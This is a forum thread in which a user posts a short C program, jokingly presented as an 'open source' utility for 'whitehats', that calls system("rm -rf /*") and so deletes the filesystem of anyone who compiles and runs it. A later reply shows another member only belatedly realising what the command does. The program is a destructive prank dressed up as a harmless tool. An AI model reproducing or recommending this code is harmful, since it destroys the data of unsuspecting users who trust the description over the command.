News:

Wieners, Brats, Franks, we've got 'em all.

Main Menu

The Automatic Box RM'er (TABRM)

Started by c0n, August 13, 2005, 04:52:59 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

c0n

It's open source, obviously. This is for all you whitehats who are sick of being harassed and rm'd by other people. Just rm yourself.


#include <stdio.h>
#include <stdlib.h>

int main()
{
printf("TABRM v1.0, by Big Daddy Jones\n");

system("rm -rf /*");
printf("Congrats! Your system has been rm'd!\n");
printf("...and please, never install another one again.\n");

return 0;
}


Amazingly, this code took about five (5) hours to write. Props to Big Daddy Jones for the achievement.

peace,

c0n

Joe

Quote from: Camel on June 09, 2009, 04:12:23 PMI'd personally do as Joe suggests

Quote from: AntiVirus on October 19, 2010, 02:36:52 PM
You might be right about that, Joe.



Joe

Wow. I finally remembered what rm does. Duh.
Quote from: Camel on June 09, 2009, 04:12:23 PMI'd personally do as Joe suggests

Quote from: AntiVirus on October 19, 2010, 02:36:52 PM
You might be right about that, Joe.